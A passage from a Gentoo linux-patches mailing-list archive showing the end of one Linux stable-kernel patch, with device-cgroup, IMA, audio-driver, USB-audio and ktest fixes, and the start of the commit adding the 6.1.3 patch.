++		panic("MPTCP: failed to init subflow v6 request sock ops\n");
++
+ 	subflow_request_sock_ipv6_ops = tcp_request_sock_ipv6_ops;
+ 	subflow_request_sock_ipv6_ops.route_req = subflow_v6_route_req;
+ 
+diff --git a/security/device_cgroup.c b/security/device_cgroup.c
+index a9f8c63a96d1a..bef2b9285fb34 100644
+--- a/security/device_cgroup.c
++++ b/security/device_cgroup.c
+@@ -82,6 +82,17 @@ free_and_exit:
+ 	return -ENOMEM;
+ }
+ 
++static void dev_exceptions_move(struct list_head *dest, struct list_head *orig)
++{
++	struct dev_exception_item *ex, *tmp;
++
++	lockdep_assert_held(&devcgroup_mutex);
++
++	list_for_each_entry_safe(ex, tmp, orig, list) {
++		list_move_tail(&ex->list, dest);
++	}
++}
++
+ /*
+  * called under devcgroup_mutex
+  */
+@@ -604,11 +615,13 @@ static int devcgroup_update_access(struct dev_cgroup *devcgroup,
+ 	int count, rc = 0;
+ 	struct dev_exception_item ex;
+ 	struct dev_cgroup *parent = css_to_devcgroup(devcgroup->css.parent);
++	struct dev_cgroup tmp_devcgrp;
+ 
+ 	if (!capable(CAP_SYS_ADMIN))
+ 		return -EPERM;
+ 
+ 	memset(&ex, 0, sizeof(ex));
++	memset(&tmp_devcgrp, 0, sizeof(tmp_devcgrp));
+ 	b = buffer;
+ 
+ 	switch (*b) {
+@@ -620,15 +633,27 @@ static int devcgroup_update_access(struct dev_cgroup *devcgroup,
+ 
+ 			if (!may_allow_all(parent))
+ 				return -EPERM;
+-			dev_exception_clean(devcgroup);
+-			devcgroup->behavior = DEVCG_DEFAULT_ALLOW;
+-			if (!parent)
++			if (!parent) {
++				devcgroup->behavior = DEVCG_DEFAULT_ALLOW;
++				dev_exception_clean(devcgroup);
+ 				break;
++			}
+ 
++			INIT_LIST_HEAD(&tmp_devcgrp.exceptions);
++			rc = dev_exceptions_copy(&tmp_devcgrp.exceptions,
++						 &devcgroup->exceptions);
++			if (rc)
++				return rc;
++			dev_exception_clean(devcgroup);
+ 			rc = dev_exceptions_copy(&devcgroup->exceptions,
+ 						 &parent->exceptions);
+-			if (rc)
++			if (rc) {
++				dev_exceptions_move(&devcgroup->exceptions,
++						    &tmp_devcgrp.exceptions);
+ 				return rc;
++			}
++			devcgroup->behavior = DEVCG_DEFAULT_ALLOW;
++			dev_exception_clean(&tmp_devcgrp);
+ 			break;
+ 		case DEVCG_DENY:
+ 			if (css_has_online_children(&devcgroup->css))
+diff --git a/security/integrity/ima/Kconfig b/security/integrity/ima/Kconfig
+index 7249f16257c72..39caeca474449 100644
+--- a/security/integrity/ima/Kconfig
++++ b/security/integrity/ima/Kconfig
+@@ -112,7 +112,7 @@ choice
+ 
+ 	config IMA_DEFAULT_HASH_SM3
+ 		bool "SM3"
+-		depends on CRYPTO_SM3=y
++		depends on CRYPTO_SM3_GENERIC=y
+ endchoice
+ 
+ config IMA_DEFAULT_HASH
+diff --git a/security/integrity/ima/ima_main.c b/security/integrity/ima/ima_main.c
+index 040b03ddc1c77..4a207a3ef7ef3 100644
+--- a/security/integrity/ima/ima_main.c
++++ b/security/integrity/ima/ima_main.c
+@@ -542,8 +542,13 @@ static int __ima_inode_hash(struct inode *inode, struct file *file, char *buf,
+ 
+ 		rc = ima_collect_measurement(&tmp_iint, file, NULL, 0,
+ 					     ima_hash_algo, NULL);
+-		if (rc < 0)
++		if (rc < 0) {
++			/* ima_hash could be allocated in case of failure. */
++			if (rc != -ENOMEM)
++				kfree(tmp_iint.ima_hash);
++
+ 			return -EOPNOTSUPP;
++		}
+ 
+ 		iint = &tmp_iint;
+ 		mutex_lock(&iint->mutex);
+diff --git a/security/integrity/ima/ima_template.c b/security/integrity/ima/ima_template.c
+index 195ac18f09275..04c49f05cb74f 100644
+--- a/security/integrity/ima/ima_template.c
++++ b/security/integrity/ima/ima_template.c
+@@ -340,8 +340,11 @@ static struct ima_template_desc *restore_template_fmt(char *template_name)
+ 
+ 	template_desc->name = "";
+ 	template_desc->fmt = kstrdup(template_name, GFP_KERNEL);
+-	if (!template_desc->fmt)
++	if (!template_desc->fmt) {
++		kfree(template_desc);
++		template_desc = NULL;
+ 		goto out;
++	}
+ 
+ 	spin_lock(&template_list);
+ 	list_add_tail_rcu(&template_desc->list, &defined_templates);
+diff --git a/security/integrity/platform_certs/load_uefi.c b/security/integrity/platform_certs/load_uefi.c
+index b78753d27d8ea..d1fdd113450a6 100644
+--- a/security/integrity/platform_certs/load_uefi.c
++++ b/security/integrity/platform_certs/load_uefi.c
+@@ -35,6 +35,7 @@ static const struct dmi_system_id uefi_skip_cert[] = {
+ 	{ UEFI_QUIRK_SKIP_CERT("Apple Inc.", "MacPro7,1") },
+ 	{ UEFI_QUIRK_SKIP_CERT("Apple Inc.", "iMac20,1") },
+ 	{ UEFI_QUIRK_SKIP_CERT("Apple Inc.", "iMac20,2") },
++	{ UEFI_QUIRK_SKIP_CERT("Apple Inc.", "iMacPro1,1") },
+ 	{ }
+ };
+ 
+diff --git a/sound/pci/hda/patch_cs8409.c b/sound/pci/hda/patch_cs8409.c
+index 754aa8ddd2e4f..0ba1fbcbb21e4 100644
+--- a/sound/pci/hda/patch_cs8409.c
++++ b/sound/pci/hda/patch_cs8409.c
+@@ -888,7 +888,7 @@ static void cs42l42_resume(struct sub_codec *cs42l42)
+ 
+ 	/* Initialize CS42L42 companion codec */
+ 	cs8409_i2c_bulk_write(cs42l42, cs42l42->init_seq, cs42l42->init_seq_num);
+-	usleep_range(20000, 25000);
++	usleep_range(30000, 35000);
+ 
+ 	/* Clear interrupts, by reading interrupt status registers */
+ 	cs8409_i2c_bulk_read(cs42l42, irq_regs, ARRAY_SIZE(irq_regs));
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index f5f640851fdcb..3794b522c2222 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -6903,6 +6903,34 @@ static void alc287_fixup_yoga9_14iap7_bass_spk_pin(struct hda_codec *codec,
+ 	}
+ }
+ 
++static void alc295_fixup_dell_inspiron_top_speakers(struct hda_codec *codec,
++					  const struct hda_fixup *fix, int action)
++{
++	static const struct hda_pintbl pincfgs[] = {
++		{ 0x14, 0x90170151 },
++		{ 0x17, 0x90170150 },
++		{ }
++	};
++	static const hda_nid_t conn[] = { 0x02, 0x03 };
++	static const hda_nid_t preferred_pairs[] = {
++		0x14, 0x02,
++		0x17, 0x03,
++		0x21, 0x02,
++		0
++	};
++	struct alc_spec *spec = codec->spec;
++
++	alc_fixup_no_shutup(codec, fix, action);
++
++	switch (action) {
++	case HDA_FIXUP_ACT_PRE_PROBE:
++		snd_hda_apply_pincfgs(codec, pincfgs);
++		snd_hda_override_conn_list(codec, 0x17, ARRAY_SIZE(conn), conn);
++		spec->gen.preferred_dacs = preferred_pairs;
++		break;
++	}
++}
++
+ enum {
+ 	ALC269_FIXUP_GPIO2,
+ 	ALC269_FIXUP_SONY_VAIO,
+@@ -7146,6 +7174,8 @@ enum {
+ 	ALC287_FIXUP_LEGION_16ITHG6,
+ 	ALC287_FIXUP_YOGA9_14IAP7_BASS_SPK,
+ 	ALC287_FIXUP_YOGA9_14IAP7_BASS_SPK_PIN,
++	ALC295_FIXUP_DELL_INSPIRON_TOP_SPEAKERS,
++	ALC236_FIXUP_DELL_DUAL_CODECS,
+ };
+ 
+ /* A special fixup for Lenovo C940 and Yoga Duet 7;
+@@ -9095,6 +9125,18 @@ static const struct hda_fixup alc269_fixups[] = {
+ 		.chained = true,
+ 		.chain_id = ALC287_FIXUP_YOGA9_14IAP7_BASS_SPK,
+ 	},
++	[ALC295_FIXUP_DELL_INSPIRON_TOP_SPEAKERS] = {
++		.type = HDA_FIXUP_FUNC,
++		.v.func = alc295_fixup_dell_inspiron_top_speakers,
++		.chained = true,
++		.chain_id = ALC269_FIXUP_DELL4_MIC_NO_PRESENCE,
++	},
++	[ALC236_FIXUP_DELL_DUAL_CODECS] = {
++		.type = HDA_FIXUP_PINS,
++		.v.func = alc1220_fixup_gb_dual_codecs,
++		.chained = true,
++		.chain_id = ALC255_FIXUP_DELL1_MIC_NO_PRESENCE,
++	},
+ };
+ 
+ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+@@ -9195,6 +9237,14 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1028, 0x0a9e, "Dell Latitude 5430", ALC269_FIXUP_DELL4_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1028, 0x0b19, "Dell XPS 15 9520", ALC289_FIXUP_DUAL_SPK),
+ 	SND_PCI_QUIRK(0x1028, 0x0b1a, "Dell Precision 5570", ALC289_FIXUP_DUAL_SPK),
++	SND_PCI_QUIRK(0x1028, 0x0b37, "Dell Inspiron 16 Plus 7620 2-in-1", ALC295_FIXUP_DELL_INSPIRON_TOP_SPEAKERS),
++	SND_PCI_QUIRK(0x1028, 0x0b71, "Dell Inspiron 16 Plus 7620", ALC295_FIXUP_DELL_INSPIRON_TOP_SPEAKERS),
++	SND_PCI_QUIRK(0x1028, 0x0c19, "Dell Precision 3340", ALC236_FIXUP_DELL_DUAL_CODECS),
++	SND_PCI_QUIRK(0x1028, 0x0c1a, "Dell Precision 3340", ALC236_FIXUP_DELL_DUAL_CODECS),
++	SND_PCI_QUIRK(0x1028, 0x0c1b, "Dell Precision 3440", ALC236_FIXUP_DELL_DUAL_CODECS),
++	SND_PCI_QUIRK(0x1028, 0x0c1c, "Dell Precision 3540", ALC236_FIXUP_DELL_DUAL_CODECS),
++	SND_PCI_QUIRK(0x1028, 0x0c1d, "Dell Precision 3440", ALC236_FIXUP_DELL_DUAL_CODECS),
++	SND_PCI_QUIRK(0x1028, 0x0c1e, "Dell Precision 3540", ALC236_FIXUP_DELL_DUAL_CODECS),
+ 	SND_PCI_QUIRK(0x1028, 0x164a, "Dell", ALC293_FIXUP_DELL1_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1028, 0x164b, "Dell", ALC293_FIXUP_DELL1_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x103c, 0x1586, "HP", ALC269_FIXUP_HP_MUTE_LED_MIC2),
+diff --git a/sound/soc/jz4740/jz4740-i2s.c b/sound/soc/jz4740/jz4740-i2s.c
+index c4c1e89b47c1b..83cb81999c6fc 100644
+--- a/sound/soc/jz4740/jz4740-i2s.c
++++ b/sound/soc/jz4740/jz4740-i2s.c
+@@ -55,7 +55,8 @@
+ #define JZ_AIC_CTRL_MONO_TO_STEREO BIT(11)
+ #define JZ_AIC_CTRL_SWITCH_ENDIANNESS BIT(10)
+ #define JZ_AIC_CTRL_SIGNED_TO_UNSIGNED BIT(9)
+-#define JZ_AIC_CTRL_FLUSH		BIT(8)
++#define JZ_AIC_CTRL_TFLUSH		BIT(8)
++#define JZ_AIC_CTRL_RFLUSH		BIT(7)
+ #define JZ_AIC_CTRL_ENABLE_ROR_INT BIT(6)
+ #define JZ_AIC_CTRL_ENABLE_TUR_INT BIT(5)
+ #define JZ_AIC_CTRL_ENABLE_RFS_INT BIT(4)
+@@ -90,6 +91,8 @@ enum jz47xx_i2s_version {
+ struct i2s_soc_info {
+ 	enum jz47xx_i2s_version version;
+ 	struct snd_soc_dai_driver *dai;
++
++	bool shared_fifo_flush;
+ };
+ 
+ struct jz4740_i2s {
+@@ -116,19 +119,44 @@ static inline void jz4740_i2s_write(const struct jz4740_i2s *i2s,
+ 	writel(value, i2s->base + reg);
+ }
+ 
++static inline void jz4740_i2s_set_bits(const struct jz4740_i2s *i2s,
++	unsigned int reg, uint32_t bits)
++{
++	uint32_t value = jz4740_i2s_read(i2s, reg);
++	value |= bits;
++	jz4740_i2s_write(i2s, reg, value);
++}
++
+ static int jz4740_i2s_startup(struct snd_pcm_substream *substream,
+ 	struct snd_soc_dai *dai)
+ {
+ 	struct jz4740_i2s *i2s = snd_soc_dai_get_drvdata(dai);
+-	uint32_t conf, ctrl;
++	uint32_t conf;
+ 	int ret;
+ 
++	/*
++	 * When we can flush FIFOs independently, only flush the FIFO
++	 * that is starting up. We can do this when the DAI is active
++	 * because it does not disturb other active substreams.
++	 */
++	if (!i2s->soc_info->shared_fifo_flush) {
++		if (substream->stream == SNDRV_PCM_STREAM_PLAYBACK)
++			jz4740_i2s_set_bits(i2s, JZ_REG_AIC_CTRL, JZ_AIC_CTRL_TFLUSH);
++		else
++			jz4740_i2s_set_bits(i2s, JZ_REG_AIC_CTRL, JZ_AIC_CTRL_RFLUSH);
++	}
++
+ 	if (snd_soc_dai_active(dai))
+ 		return 0;
+ 
+-	ctrl = jz4740_i2s_read(i2s, JZ_REG_AIC_CTRL);
+-	ctrl |= JZ_AIC_CTRL_FLUSH;
+-	jz4740_i2s_write(i2s, JZ_REG_AIC_CTRL, ctrl);
++	/*
++	 * When there is a shared flush bit for both FIFOs, the TFLUSH
++	 * bit flushes both FIFOs. Flushing while the DAI is active would
++	 * cause FIFO underruns in other active substreams so we have to
++	 * guard this behind the snd_soc_dai_active() check.
++	 */
++	if (i2s->soc_info->shared_fifo_flush)
++		jz4740_i2s_set_bits(i2s, JZ_REG_AIC_CTRL, JZ_AIC_CTRL_TFLUSH);
+ 
+ 	ret = clk_prepare_enable(i2s->clk_i2s);
+ 	if (ret)
+@@ -443,6 +471,7 @@ static struct snd_soc_dai_driver jz4740_i2s_dai = {
+ static const struct i2s_soc_info jz4740_i2s_soc_info = {
+ 	.version = JZ_I2S_JZ4740,
+ 	.dai = &jz4740_i2s_dai,
++	.shared_fifo_flush = true,
+ };
+ 
+ static const struct i2s_soc_info jz4760_i2s_soc_info = {
+diff --git a/sound/usb/card.h b/sound/usb/card.h
+index 40061550105ac..6ec95b2edf863 100644
+--- a/sound/usb/card.h
++++ b/sound/usb/card.h
+@@ -131,6 +131,7 @@ struct snd_usb_endpoint {
+ 	bool lowlatency_playback;	/* low-latency playback mode */
+ 	bool need_setup;		/* (re-)need for hw_params? */
+ 	bool need_prepare;		/* (re-)need for prepare? */
++	bool fixed_rate;		/* skip rate setup */
+ 
+ 	/* for hw constraints */
+ 	const struct audioformat *cur_audiofmt;
+diff --git a/sound/usb/endpoint.c b/sound/usb/endpoint.c
+index 4aaf0784940b5..419302e2057e8 100644
+--- a/sound/usb/endpoint.c
++++ b/sound/usb/endpoint.c
+@@ -769,7 +769,8 @@ struct snd_usb_endpoint *
+ snd_usb_endpoint_open(struct snd_usb_audio *chip,
+ 		      const struct audioformat *fp,
+ 		      const struct snd_pcm_hw_params *params,
+-		      bool is_sync_ep)
++		      bool is_sync_ep,
++		      bool fixed_rate)
+ {
+ 	struct snd_usb_endpoint *ep;
+ 	int ep_num = is_sync_ep ? fp->sync_ep : fp->endpoint;
+@@ -825,6 +826,7 @@ snd_usb_endpoint_open(struct snd_usb_audio *chip,
+ 		ep->implicit_fb_sync = fp->implicit_fb;
+ 		ep->need_setup = true;
+ 		ep->need_prepare = true;
++		ep->fixed_rate = fixed_rate;
+ 
+ 		usb_audio_dbg(chip, "  channels=%d, rate=%d, format=%s, period_bytes=%d, periods=%d, implicit_fb=%d\n",
+ 			      ep->cur_channels, ep->cur_rate,
+@@ -1413,11 +1415,13 @@ static int init_sample_rate(struct snd_usb_audio *chip,
+ 	if (clock && !clock->need_setup)
+ 		return 0;
+ 
+-	err = snd_usb_init_sample_rate(chip, ep->cur_audiofmt, rate);
+-	if (err < 0) {
+-		if (clock)
+-			clock->rate = 0; /* reset rate */
+-		return err;
++	if (!ep->fixed_rate) {
++		err = snd_usb_init_sample_rate(chip, ep->cur_audiofmt, rate);
++		if (err < 0) {
++			if (clock)
++				clock->rate = 0; /* reset rate */
++			return err;
++		}
+ 	}
+ 
+ 	if (clock)
+diff --git a/sound/usb/endpoint.h b/sound/usb/endpoint.h
+index e67ea28faa54f..924f4351588ce 100644
+--- a/sound/usb/endpoint.h
++++ b/sound/usb/endpoint.h
+@@ -14,7 +14,8 @@ struct snd_usb_endpoint *
+ snd_usb_endpoint_open(struct snd_usb_audio *chip,
+ 		      const struct audioformat *fp,
+ 		      const struct snd_pcm_hw_params *params,
+-		      bool is_sync_ep);
++		      bool is_sync_ep,
++		      bool fixed_rate);
+ void snd_usb_endpoint_close(struct snd_usb_audio *chip,
+ 			    struct snd_usb_endpoint *ep);
+ int snd_usb_endpoint_set_params(struct snd_usb_audio *chip,
+diff --git a/sound/usb/implicit.c b/sound/usb/implicit.c
+index f3e8484b3d9cb..41ac7185b42b6 100644
+--- a/sound/usb/implicit.c
++++ b/sound/usb/implicit.c
+@@ -15,6 +15,7 @@
+ #include "usbaudio.h"
+ #include "card.h"
+ #include "helper.h"
++#include "pcm.h"
+ #include "implicit.h"
+ 
+ enum {
+@@ -455,7 +456,8 @@ const struct audioformat *
+ snd_usb_find_implicit_fb_sync_format(struct snd_usb_audio *chip,
+ 				     const struct audioformat *target,
+ 				     const struct snd_pcm_hw_params *params,
+-				     int stream)
++				     int stream,
++				     bool *fixed_rate)
+ {
+ 	struct snd_usb_substream *subs;
+ 	const struct audioformat *fp, *sync_fmt = NULL;
+@@ -483,6 +485,8 @@ snd_usb_find_implicit_fb_sync_format(struct snd_usb_audio *chip,
+ 		}
+ 	}
+ 
++	if (fixed_rate)
++		*fixed_rate = snd_usb_pcm_has_fixed_rate(subs);
+ 	return sync_fmt;
+ }
+ 
+diff --git a/sound/usb/implicit.h b/sound/usb/implicit.h
+index ccb415a0ea860..7f1577b6c4d38 100644
+--- a/sound/usb/implicit.h
++++ b/sound/usb/implicit.h
+@@ -9,6 +9,6 @@ const struct audioformat *
+ snd_usb_find_implicit_fb_sync_format(struct snd_usb_audio *chip,
+ 				     const struct audioformat *target,
+ 				     const struct snd_pcm_hw_params *params,
+-				     int stream);
++				     int stream, bool *fixed_rate);
+ 
+ #endif /* __USBAUDIO_IMPLICIT_H */
+diff --git a/sound/usb/pcm.c b/sound/usb/pcm.c
+index 9557bd4d1bbca..99a66d0ef5b26 100644
+--- a/sound/usb/pcm.c
++++ b/sound/usb/pcm.c
+@@ -157,6 +157,31 @@ find_substream_format(struct snd_usb_substream *subs,
+ 			   true, subs);
+ }
+ 
++bool snd_usb_pcm_has_fixed_rate(struct snd_usb_substream *subs)
++{
++	const struct audioformat *fp;
++	struct snd_usb_audio *chip = subs->stream->chip;
++	int rate = -1;
++
++	if (!(chip->quirk_flags & QUIRK_FLAG_FIXED_RATE))
++		return false;
++	list_for_each_entry(fp, &subs->fmt_list, list) {
++		if (fp->rates & SNDRV_PCM_RATE_CONTINUOUS)
++			return false;
++		if (fp->nr_rates < 1)
++			continue;
++		if (fp->nr_rates > 1)
++			return false;
++		if (rate < 0) {
++			rate = fp->rate_table[0];
++			continue;
++		}
++		if (rate != fp->rate_table[0])
++			return false;
++	}
++	return true;
++}
++
+ static int init_pitch_v1(struct snd_usb_audio *chip, int ep)
+ {
+ 	struct usb_device *dev = chip->dev;
+@@ -450,12 +475,14 @@ static int snd_usb_hw_params(struct snd_pcm_substream *substream,
+ 	struct snd_usb_audio *chip = subs->stream->chip;
+ 	const struct audioformat *fmt;
+ 	const struct audioformat *sync_fmt;
++	bool fixed_rate, sync_fixed_rate;
+ 	int ret;
+ 
+ 	ret = snd_media_start_pipeline(subs);
+ 	if (ret)
+ 		return ret;
+ 
++	fixed_rate = snd_usb_pcm_has_fixed_rate(subs);
+ 	fmt = find_substream_format(subs, hw_params);
+ 	if (!fmt) {
+ 		usb_audio_dbg(chip,
+@@ -469,7 +496,8 @@ static int snd_usb_hw_params(struct snd_pcm_substream *substream,
+ 	if (fmt->implicit_fb) {
+ 		sync_fmt = snd_usb_find_implicit_fb_sync_format(chip, fmt,
+ 								hw_params,
+-								!substream->stream);
++								!substream->stream,
++								&sync_fixed_rate);
+ 		if (!sync_fmt) {
+ 			usb_audio_dbg(chip,
+ 				      "cannot find sync format: ep=0x%x, iface=%d:%d, format=%s, rate=%d, channels=%d\n",
+@@ -482,6 +510,7 @@ static int snd_usb_hw_params(struct snd_pcm_substream *substream,
+ 		}
+ 	} else {
+ 		sync_fmt = fmt;
++		sync_fixed_rate = fixed_rate;
+ 	}
+ 
+ 	ret = snd_usb_lock_shutdown(chip);
+@@ -499,7 +528,7 @@ static int snd_usb_hw_params(struct snd_pcm_substream *substream,
+ 		close_endpoints(chip, subs);
+ 	}
+ 
+-	subs->data_endpoint = snd_usb_endpoint_open(chip, fmt, hw_params, false);
++	subs->data_endpoint = snd_usb_endpoint_open(chip, fmt, hw_params, false, fixed_rate);
+ 	if (!subs->data_endpoint) {
+ 		ret = -EINVAL;
+ 		goto unlock;
+@@ -508,7 +537,8 @@ static int snd_usb_hw_params(struct snd_pcm_substream *substream,
+ 	if (fmt->sync_ep) {
+ 		subs->sync_endpoint = snd_usb_endpoint_open(chip, sync_fmt,
+ 							    hw_params,
+-							    fmt == sync_fmt);
++							    fmt == sync_fmt,
++							    sync_fixed_rate);
+ 		if (!subs->sync_endpoint) {
+ 			ret = -EINVAL;
+ 			goto unlock;
+diff --git a/sound/usb/pcm.h b/sound/usb/pcm.h
+index 493a4e34d78dc..388fe2ba346d6 100644
+--- a/sound/usb/pcm.h
++++ b/sound/usb/pcm.h
+@@ -6,6 +6,8 @@ void snd_usb_set_pcm_ops(struct snd_pcm *pcm, int stream);
+ int snd_usb_pcm_suspend(struct snd_usb_stream *as);
+ int snd_usb_pcm_resume(struct snd_usb_stream *as);
+ 
++bool snd_usb_pcm_has_fixed_rate(struct snd_usb_substream *as);
++
+ int snd_usb_init_pitch(struct snd_usb_audio *chip,
+ 		       const struct audioformat *fmt);
+ void snd_usb_preallocate_buffer(struct snd_usb_substream *subs);
+diff --git a/sound/usb/quirks.c b/sound/usb/quirks.c
+index 58b37bfc885cb..3d13fdf7590cd 100644
+--- a/sound/usb/quirks.c
++++ b/sound/usb/quirks.c
+@@ -2152,6 +2152,8 @@ static const struct usb_audio_quirk_flags_table quirk_flags_table[] = {
+ 		   QUIRK_FLAG_GENERIC_IMPLICIT_FB),
+ 	DEVICE_FLG(0x0525, 0xa4ad, /* Hamedal C20 usb camero */
+ 		   QUIRK_FLAG_IFACE_SKIP_CLOSE),
++	DEVICE_FLG(0x0ecb, 0x2069, /* JBL Quantum810 Wireless */
++		   QUIRK_FLAG_FIXED_RATE),
+ 
+ 	/* Vendor matches */
+ 	VENDOR_FLG(0x045e, /* MS Lifecam */
+diff --git a/sound/usb/usbaudio.h b/sound/usb/usbaudio.h
+index 2aba508a48312..f5a8dca66457f 100644
+--- a/sound/usb/usbaudio.h
++++ b/sound/usb/usbaudio.h
+@@ -175,6 +175,9 @@ extern bool snd_usb_skip_validation;
+  * QUIRK_FLAG_FORCE_IFACE_RESET
+  *  Force an interface reset whenever stopping & restarting a stream
+  *  (e.g. after xrun)
++ * QUIRK_FLAG_FIXED_RATE
++ *  Do not set PCM rate (frequency) when only one rate is available
++ *  for the given endpoint.
+  */
+ 
+ #define QUIRK_FLAG_GET_SAMPLE_RATE	(1U << 0)
+@@ -198,5 +201,6 @@ extern bool snd_usb_skip_validation;
+ #define QUIRK_FLAG_SKIP_IMPLICIT_FB	(1U << 18)
+ #define QUIRK_FLAG_IFACE_SKIP_CLOSE	(1U << 19)
+ #define QUIRK_FLAG_FORCE_IFACE_RESET	(1U << 20)
++#define QUIRK_FLAG_FIXED_RATE		(1U << 21)
+ 
+ #endif /* __USBAUDIO_H */
+diff --git a/tools/testing/ktest/ktest.pl b/tools/testing/ktest/ktest.pl
+index 09d1578f9d66f..1737c59e4ff67 100755
+--- a/tools/testing/ktest/ktest.pl
++++ b/tools/testing/ktest/ktest.pl
+@@ -1963,7 +1963,7 @@ sub run_scp_mod {
+ 
+ sub _get_grub_index {
+ 
+-    my ($command, $target, $skip) = @_;
++    my ($command, $target, $skip, $submenu) = @_;
+ 
+     return if (defined($grub_number) && defined($last_grub_menu) &&
+ 	$last_grub_menu eq $grub_menu && defined($last_machine) &&
+@@ -1980,11 +1980,16 @@ sub _get_grub_index {
+ 
+     my $found = 0;
+ 
++    my $submenu_number = 0;
++
+     while (<IN>) {
+ 	if (/$target/) {
+ 	    $grub_number++;
+ 	    $found = 1;
+ 	    last;
++	} elsif (defined($submenu) && /$submenu/) {
++		$submenu_number++;
++		$grub_number = -1;
+ 	} elsif (/$skip/) {
+ 	    $grub_number++;
+ 	}
+@@ -1993,6 +1998,9 @@ sub _get_grub_index {
+ 
+     dodie "Could not find '$grub_menu' through $command on $machine"
+ 	if (!$found);
++    if ($submenu_number > 0) {
++	$grub_number = "$submenu_number>$grub_number";
++    }
+     doprint "$grub_number\n";
+     $last_grub_menu = $grub_menu;
+     $last_machine = $machine;
+@@ -2003,6 +2011,7 @@ sub get_grub_index {
+     my $command;
+     my $target;
+     my $skip;
++    my $submenu;
+     my $grub_menu_qt;
+ 
+     if ($reboot_type !~ /^grub/) {
+@@ -2017,8 +2026,9 @@ sub get_grub_index {
+ 	$skip = '^\s*title\s';
+     } elsif ($reboot_type eq "grub2") {
+ 	$command = "cat $grub_file";
+-	$target = '^menuentry.*' . $grub_menu_qt;
+-	$skip = '^menuentry\s|^submenu\s';
++	$target = '^\s*menuentry.*' . $grub_menu_qt;
++	$skip = '^\s*menuentry';
++	$submenu = '^\s*submenu\s';
+     } elsif ($reboot_type eq "grub2bls") {
+ 	$command = $grub_bls_get;
+ 	$target = '^title=.*' . $grub_menu_qt;
+@@ -2027,7 +2037,7 @@ sub get_grub_index {
+ 	return;
+     }
+ 
+-    _get_grub_index($command, $target, $skip);
++    _get_grub_index($command, $target, $skip, $submenu);
+ }
+ 
+ sub wait_for_input {
+@@ -2090,7 +2100,7 @@ sub reboot_to {
+     if ($reboot_type eq "grub") {
+ 	run_ssh "'(echo \"savedefault --default=$grub_number --once\" | grub --batch)'";
+     } elsif (($reboot_type eq "grub2") or ($reboot_type eq "grub2bls")) {
+-	run_ssh "$grub_reboot $grub_number";
++	run_ssh "$grub_reboot \"'$grub_number'\"";
+     } elsif ($reboot_type eq "syslinux") {
+ 	run_ssh "$syslinux --once \\\"$syslinux_label\\\" $syslinux_path";
+     } elsif (defined $reboot_script) {
+@@ -3768,9 +3778,10 @@ sub test_this_config {
+     # .config to make sure it is missing the config that
+     # we had before
+     my %configs = %min_configs;
+-    delete $configs{$config};
++    $configs{$config} = "# $config is not set";
+     make_new_config ((values %configs), (values %keep_configs));
+     make_oldconfig;
++    delete $configs{$config};
+     undef %configs;
+     assign_configs \%configs, $output_config;
+ 
+diff --git a/tools/testing/selftests/lib.mk b/tools/testing/selftests/lib.mk
+index a3ea3d4a206d0..291144c284fbc 100644
+--- a/tools/testing/selftests/lib.mk
++++ b/tools/testing/selftests/lib.mk
+@@ -123,6 +123,11 @@ endef
+ clean:
+ 	$(CLEAN)
+ 
++# Enables to extend CFLAGS and LDFLAGS from command line, e.g.
++# make USERCFLAGS=-Werror USERLDFLAGS=-static
++CFLAGS += $(USERCFLAGS)
++LDFLAGS += $(USERLDFLAGS)
++
+ # When make O= with kselftest target from main level
+ # the following aren't defined.
+ #


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-01-04 11:37 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-01-04 11:37 UTC (permalink / raw
  To: gentoo-commits

commit:     7c26232904d6e8afce4197aacf2e2fa2a2afdcf1
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Jan  4 11:37:35 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Jan  4 11:37:35 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=7c262329

Linux patch 6.1.3

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README            |    4 +
 1002_linux-6.1.3.patch | 2606 ++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 2610 insertions(+)

diff --git a/0000_README b/0000_README
index 7f1d2ce2..1fe5b8d9 100644
--- a/0000_README
+++ b/0000_README
@@ -51,6 +51,10 @@ Patch:  1001_linux-6.1.2.patch
 From:   http://www.kernel.org
 Desc:   Linux 6.1.2
 
+Patch:  1002_linux-6.1.3.patch
+From:   http://www.kernel.org
+Desc:   Linux 6.1.3
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1002_linux-6.1.3.patch b/1002_linux-6.1.3.patch
new file mode 100644
index 00000000..6909dce5
--- /dev/null
+++ b/1002_linux-6.1.3.patch
@@ -0,0 +1,2606 @@
+diff --git a/Documentation/trace/kprobes.rst b/Documentation/trace/kprobes.rst
+index 48cf778a24680..fc7ce76eab655 100644
+--- a/Documentation/trace/kprobes.rst
++++ b/Documentation/trace/kprobes.rst
+@@ -131,8 +131,7 @@ For example, if the function is non-recursive and is called with a
+ spinlock held, maxactive = 1 should be enough.  If the function is
+ non-recursive and can never relinquish the CPU (e.g., via a semaphore
+ or preemption), NR_CPUS should be enough.  If maxactive <= 0, it is
+-set to a default value.  If CONFIG_PREEMPT is enabled, the default
+-is max(10, 2*NR_CPUS).  Otherwise, the default is NR_CPUS.
++set to a default value: max(10, 2*NR_CPUS).
+ 
+ It's not a disaster if you set maxactive too low; you'll just miss
+ some probes.  In the kretprobe struct, the nmissed field is set to
+diff --git a/Makefile b/Makefile
+index 2ecc568c779fa..a69d14983a489 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 2
